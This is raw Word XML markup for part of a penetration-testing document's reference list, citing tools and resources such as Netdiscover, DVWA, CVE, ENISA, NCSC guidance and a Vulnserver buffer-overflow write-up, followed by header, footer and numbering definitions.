    <w:p w14:paraId="7A65FF35" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FC9428" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Netdiscover.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://github.com/netdiscover/netdiscover</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35CC9EC5" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F3B60D" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Damn Vulnerable Web Application).  GitHub Repository.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://github.com/digininja/DVWA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="719BB2F6" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2D87F1" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Ektron Content Management System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Ektron CMS.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.ektron.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56C51D10" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F8DA08" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>11. Microsoft Security.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Best practices for Remote Desktop Protocol (RDP) security.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/rds-security-best-practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FD16255" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB659A2" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>12. Ektron CMS Documentation.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>ttps://documentation.alphagov.co.uk/documentation/penetration-testing/tools/ektron.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54994DFA" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>13. Offensive Security.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Penetration Testing with Kali Linux (PWK).  </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/pwk-oscp/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18515D85" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047D67CD" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>14. Common Vulnerabilities and Exposures (CVE).</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A03C497" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D99B9A2" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>15. European Union Agency for Cybersecurity (ENISA).</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Threat Landscape Report.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.enisa.europa.eu/publications/threat-landscape-report</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D736174" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6E84AA" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>16. CERT Division, Software Engineering Institute, Carnegie Mellon University.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Vulnerability Notes Database.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.kb.cert.org/vuls/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70E472C1" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07133FD7" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>17. Information Systems Security Association (ISSA).</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Best Practices for Penetration Testing.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.issa.org/resources/penetration-testing-best-practices/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0884D9F9" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAAE824" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>18. National Cyber Security Centre (NCSC).</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Penetration Testing Framework.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.ncsc.gov.uk/guidance/penetration-testing-framework</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1698A03F" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78484B67" w14:textId="77777777" w:rsidR="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>19. Gibson, S.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Security Now! Podcast.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.grc.com/securitynow.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="576012C3" w14:textId="77777777" w:rsidR="007B683D" w:rsidRDefault="007B683D" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36807B1C" w14:textId="0C199384" w:rsidR="007B683D" w:rsidRPr="007B683D" w:rsidRDefault="007B683D" w:rsidP="007B683D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B683D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Buffer Over Flow(Vulnserver.exe).  </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidRPr="007B683D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://github.com/SkyBulk/exploit-development/blob/master/codes/vulnserver.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27F67F5B" w14:textId="77777777" w:rsidR="007B683D" w:rsidRDefault="007B683D" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753EC9E0" w14:textId="77777777" w:rsidR="007B683D" w:rsidRPr="00217239" w:rsidRDefault="007B683D" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0881A94E" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="0034765E" w:rsidRDefault="00217239" w:rsidP="00217239"/>
    <w:p w14:paraId="67D77400" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002C4E62" w:rsidRPr="002C4E62">
      <w:headerReference w:type="default" r:id="rId75"/>
      <w:footerReference w:type="default" r:id="rId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C7EF50" w14:textId="77777777" w:rsidR="009F58E0" w:rsidRDefault="009F58E0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4235CB5A" w14:textId="77777777" w:rsidR="009F58E0" w:rsidRDefault="009F58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DejaVu Serif">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="02000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Regular">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C3C14" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00BB687E">
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="808080"/>
        <w:u w:color="80808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CC954E" w14:textId="77777777" w:rsidR="009F58E0" w:rsidRDefault="009F58E0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="606F36C7" w14:textId="77777777" w:rsidR="009F58E0" w:rsidRDefault="009F58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48091" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRPr="00F23122" w:rsidRDefault="00620F73">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB236AE" wp14:editId="31E88E20">
          <wp:extent cx="5943600" cy="1099820"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="2" name="officeArt object" descr="red-header.png"/>
          <wp:cNvGraphicFramePr/>
          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:nvPicPr>
                  <pic:cNvPr id="1073741825" name="red-header.png" descr="red-header.png"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="5943600" cy="1099820"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln w="12700" cap="flat">
                    <a:noFill/>
                    <a:miter lim="400000"/>
                  </a:ln>
                  <a:effectLst/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>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441CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FA2E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D2A6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43D84B24"/>
    <w:numStyleLink w:val="ImportedStyle2"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="07E0468A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2F6A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0636B68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E388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540E9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94225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B4280"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EA80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D566E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB34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65625"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34AE5C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4E54C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87D20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95A7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1978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C55175"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0D85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05988"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BFCF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360F9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABD80978"/>
    <w:lvl w:ilvl="0" w:tplc="548A9E7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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53A50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7766F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A548D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84ECD2DC"/>
    <w:lvl w:ilvl="0" w:tplc="5720C4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6A6755"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F02E9B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D74B5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D20E0F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3641B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3CE8F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B5690F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B864B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2258C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAF8D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50F52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0FA6C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4B12C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D889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4B195C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D80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614C5D57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="216ED5B6"/>
    <w:lvl w:ilvl="0" w:tplc="5720C4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034C2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D17ADA3E"/>
    <w:lvl w:ilvl="0" w:tplc="548A9E7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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="646A055D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2FED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8F1753"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E446BC4"/>
    <w:numStyleLink w:val="ImportedStyle1"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6ED06CF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72581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056AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A28EB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23FAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99A28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0F73E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50BEF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045FF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C884A80"/>
    <w:lvl w:ilvl="0" w:tplc="DBF0201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3403BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="400C6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9608B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA949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1721484">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1270042903">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1408990355">
    <w:abstractNumId w:val="3"/>
